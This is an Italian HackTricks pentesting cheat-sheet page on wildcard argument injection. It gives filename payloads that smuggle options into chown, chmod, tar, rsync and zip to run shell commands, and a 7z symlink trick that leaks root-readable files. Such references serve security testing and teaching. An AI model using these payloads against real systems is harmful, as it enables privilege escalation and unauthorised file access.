4.7 KiB
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
- Se vuoi vedere la tua azienda pubblicizzata in HackTricks o scaricare HackTricks in PDF Controlla i PIANI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri The PEASS Family, la nostra collezione di NFT esclusivi
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguici su Twitter 🐦 @carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR ai repository github di HackTricks e HackTricks Cloud.
chown, chmod
Puoi indicare quale proprietario di file e permessi vuoi copiare per il resto dei file
touch "--reference=/my/own/path/filename"
Puoi sfruttare questo utilizzando https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (attacco combinato)
Ulteriori informazioni su https://www.exploit-db.com/papers/33930
Tar
Esegui comandi arbitrari:
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
Puoi sfruttare questo utilizzando https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (attacco tar)
Ulteriori informazioni su https://www.exploit-db.com/papers/33930
Rsync
Esegui comandi arbitrari:
Interesting rsync option from manual:
-e, --rsh=COMMAND specify the remote shell to use
--rsync-path=PROGRAM specify the rsync to run on remote machine
touch "-e sh shell.sh"
Puoi sfruttare questo utilizzando https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (attacco rsync)
Ulteriori informazioni su https://www.exploit-db.com/papers/33930
7z
In 7z anche utilizzando --
prima di *
(nota che --
significa che l'input successivo non può essere trattato come parametri, quindi solo percorsi dei file in questo caso) puoi causare un errore arbitrario per leggere un file, quindi se un comando come il seguente viene eseguito da root:
7za a /backup/$filename.zip -t7z -snl -p$pass -- *
E puoi creare file nella cartella in cui viene eseguito questo, potresti creare il file @root.txt
e il file root.txt
che è un symlink al file che desideri leggere:
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt
Quindi, quando 7z viene eseguito, tratterà root.txt
come un file contenente l'elenco dei file che dovrebbe comprimere (è ciò che indica l'esistenza di @root.txt
) e quando 7z legge root.txt
, leggerà /file/you/want/to/read
e poiché il contenuto di questo file non è un elenco di file, genererà un errore mostrando il contenuto.
Maggiori informazioni nei resoconti del box CTF di HackTheBox.
Zip
Eseguire comandi arbitrari:
zip name.zip files -T --unzip-command "sh -c whoami"
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
- Se vuoi vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF Controlla i PIANI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri The PEASS Family, la nostra collezione di esclusive NFT
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguici su Twitter 🐦 @carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR ai repository github di HackTricks e HackTricks Cloud.